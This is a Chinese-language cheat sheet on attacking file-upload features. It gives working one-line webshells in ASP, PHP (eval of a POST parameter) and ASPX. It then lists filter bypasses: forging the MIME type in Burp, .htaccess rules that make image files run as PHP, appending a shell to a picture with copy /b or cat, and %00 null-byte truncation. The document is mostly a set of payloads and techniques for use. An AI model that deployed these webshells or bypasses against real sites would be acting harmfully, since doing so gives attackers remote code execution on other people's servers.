目录
常用一句话木马
asp一句话木马:
<%execute(request(“value”))%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话木马:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
1. JS前端绕过
2. MIME -TYPE 验证
MIME((Multipurpose Internet Mail Extensions多用途互联网邮件扩展类型。
它是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。
多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。
常见的MIME类型,例如:
超文本标记语言文本 .html,html text/htm
普通文本 .txt text/plain
RTF文本. rtf application/rtf
GIF图形 .gif image/gif
JPEG图形 . jpg image/jpeg
上传文件抓包将Content-Type改为image/png
或上传png文件再用burpsuite改为php
3. 黑名单检测(特殊十六进制绕过)
4. .htaccess文件利用
AddType application/X-httpd-php .png(将png解析为php)
.htaccess文件 (或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。
它提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。
作为用户,所能使用的命令受到限制。
管理员可以通过Apache的AllowOverride指令来设置。
.htaccess文件是用于apache服务器下的控制文件访问的配置文件,因此Nginx下是不会生效的
.htaccess可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档、文件的跳转等功能。
可以在.htaccess 加入php解析规则
类似于把文件名包含1的解析成php
<FilesMatch “1”>
SetHandler application/x-httpd-php
</ FilesMatch >
1.png 就会以php执行
5. 头文件检查
png,jpg等图片格式有专有的头部需要制作一句话图片制作木马
6. copy 1.png/b(图片) + 3.php/a(木马) 2.png (复制出的图片)
7. linux系统中使用下面命令:
cat 1.png 3.php > 2.png
8. 利用二进制工具010Editor
使用010Editor打开图片,再图片末尾粘贴木马,最后保存就行。
6. 00截断
上传一个名为post.php%00.jpg的文件,弹出一个上传成功的弹窗,上传成功了,url地址栏出现了?road=/var/www/htm/ 没有返回文件的路径地址,多半是有临时文件名的存在,这就需要00截断,00截断的主要目的就是为了得到上传文件的路径地址,从而可以用蚁剑连接。
用burpsuite在URL后加php文件名和%00
函数替换
使用其他函数,比如eval可以使用assert替换。
这种方法适合eval函数被禁用时使用